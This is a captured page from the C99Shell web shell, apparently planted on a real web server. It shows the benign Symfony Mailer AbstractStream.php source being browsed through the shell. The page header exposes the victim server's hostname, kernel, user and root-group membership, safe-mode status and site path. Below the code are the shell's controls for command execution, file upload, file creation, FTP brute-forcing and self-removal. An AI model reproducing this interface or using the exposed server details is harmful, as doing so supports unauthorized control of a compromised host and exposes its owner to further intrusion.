!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/symfony/mailer/Transport/Smtp/Stream/   drwxr-xr-x
Free 28.65 GB of 117.98 GB (24.28%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     AbstractStream.php (3.85 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of the Symfony package.
 *
 * (c) Fabien Potencier <fabien@symfony.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Symfony\Component\Mailer\Transport\Smtp\Stream;

use 
Symfony\Component\Mailer\Exception\TransportException;

/**
 * A stream supporting remote sockets and local processes.
 *
 * @author Fabien Potencier <fabien@symfony.com>
 * @author Nicolas Grekas <p@tchwork.com>
 * @author Chris Corbyn
 *
 * @internal
 */
abstract class AbstractStream
{
    
/** @var resource|null */
    
protected $stream;
    
/** @var resource|null */
    
protected $in;
    
/** @var resource|null */
    
protected $out;
    protected 
$err;

    private 
string $debug '';

    public function 
write(string $bytesbool $debug true): void
    
{
        if (
$debug) {
            foreach (
explode("\n"trim($bytes)) as $line) {
                
$this->debug .= sprintf("> %s\n"$line);
            }
        }

        
$bytesToWrite \strlen($bytes);
        
$totalBytesWritten 0;
        while (
$totalBytesWritten $bytesToWrite) {
            
$bytesWritten = @fwrite($this->insubstr($bytes$totalBytesWritten));
            if (
false === $bytesWritten || === $bytesWritten) {
                throw new 
TransportException('Unable to write bytes on the wire.');
            }

            
$totalBytesWritten += $bytesWritten;
        }
    }

    
/**
     * Flushes the contents of the stream (empty it) and set the internal pointer to the beginning.
     */
    
public function flush(): void
    
{
        
fflush($this->in);
    }

    
/**
     * Performs any initialization needed.
     */
    
abstract public function initialize(): void;

    public function 
terminate(): void
    
{
        
$this->stream $this->err $this->out $this->in null;
    }

    public function 
readLine(): string
    
{
        if (
feof($this->out)) {
            return 
'';
        }

        
$line = @fgets($this->out);
        if (
'' === $line || false === $line) {
            if (
stream_get_meta_data($this->out)['timed_out']) {
                throw new 
TransportException(sprintf('Connection to "%s" timed out.'$this->getReadConnectionDescription()));
            }
            if (
feof($this->out)) { // don't use "eof" metadata, it's not accurate on Windows
                
throw new TransportException(sprintf('Connection to "%s" has been closed unexpectedly.'$this->getReadConnectionDescription()));
            }
            if (
false === $line) {
                throw new 
TransportException(sprintf('Unable to read from connection to "%s": '$this->getReadConnectionDescription().error_get_last()['message'] ?? ''));
            }
        }

        
$this->debug .= sprintf('< %s'$line);

        return 
$line;
    }

    public function 
getDebug(): string
    
{
        
$debug $this->debug;
        
$this->debug '';

        return 
$debug;
    }

    public static function 
replace(string $fromstring $toiterable $chunks): \Generator
    
{
        if (
'' === $from) {
            yield from 
$chunks;

            return;
        }

        
$carry '';
        
$fromLen \strlen($from);

        foreach (
$chunks as $chunk) {
            if (
'' === $chunk $carry.$chunk) {
                continue;
            }

            if (
str_contains($chunk$from)) {
                
$chunk explode($from$chunk);
                
$carry array_pop($chunk);

                yield 
implode($to$chunk).$to;
            } else {
                
$carry $chunk;
            }

            if (
\strlen($carry) > $fromLen) {
                yield 
substr($carry0, -$fromLen);
                
$carry substr($carry, -$fromLen);
            }
        }

        if (
'' !== $carry) {
            yield 
$carry;
        }
    }

    abstract protected function 
getReadConnectionDescription(): string;
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.004 ]--